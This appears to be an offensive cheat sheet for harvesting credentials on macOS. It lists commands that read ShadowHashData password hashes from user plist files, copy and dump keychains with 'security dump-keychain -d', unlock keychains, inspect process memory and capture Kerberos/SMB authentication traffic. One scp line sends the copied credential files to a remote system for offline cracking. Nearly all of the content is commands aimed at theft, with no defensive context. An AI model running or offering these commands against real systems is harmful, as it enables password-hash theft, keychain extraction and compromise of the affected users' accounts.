User Credentials

macOS User Database (Plist Files)

User accounts are stored in /var/db/dslocal/nodes/Default/users/. These files are in plist format.

ls /var/db/dslocal/nodes/Default/users/

Extract a specific user’s plist file:

sudo cat /var/db/dslocal/nodes/Default/users/<username>.plist

Use plutil to read and format the plist:

sudo plutil -convert xml1 -o - /var/db/dslocal/nodes/Default/users/<username>.plist

Keychain Files

Keychain files store sensitive information, including passwords.

Common keychain file locations:

ls ~/Library/Keychains/
ls /Library/Keychains/

Extract a specific keychain file:

sudo cp /Library/Keychains/<keychain-file> /path/to/destination/

Dumping Password Hashes

Retrieve a list of all users (usernames) on the host

dscl . list /Users

Dump user information (password hashes may be obscured or disabled on modern macOS)

sudo dscl . read /Users/<username>

Shadow Hash Files

Modern macOS uses hashed passwords stored in /var/db/dslocal/nodes/Default/users.

Locate the shadow hash for a specific user:

sudo defaults read /var/db/dslocal/nodes/Default/users/<username>.plist ShadowHashData

Copying and Transferring Credential Files

Copy Files Locally

sudo cp /var/db/dslocal/nodes/Default/users/<username>.plist /path/to/destination/

Secure Transfer

Use scp to transfer files to a remote system for offline analysis:

scp /path/to/destination/<file> user@remote-system:/remote/path/

Keychain Decryption (Advanced)

Use the security command to interact with keychain items

security dump-keychain -d /path/to/keychain.keychain-db

Attempt to unlock the keychain if you have the user’s password:

security unlock-keychain -p <password> /path/to/keychain.keychain-db

Advanced Techniques

Memory Dumping

Dump running process memory information to look for credentials:

sudo vmmap -w <PID>

Network Capture

Monitor authentication traffic using tcpdump

sudo tcpdump -i en0 port 88 or port 445 -w auth_traffic.pcap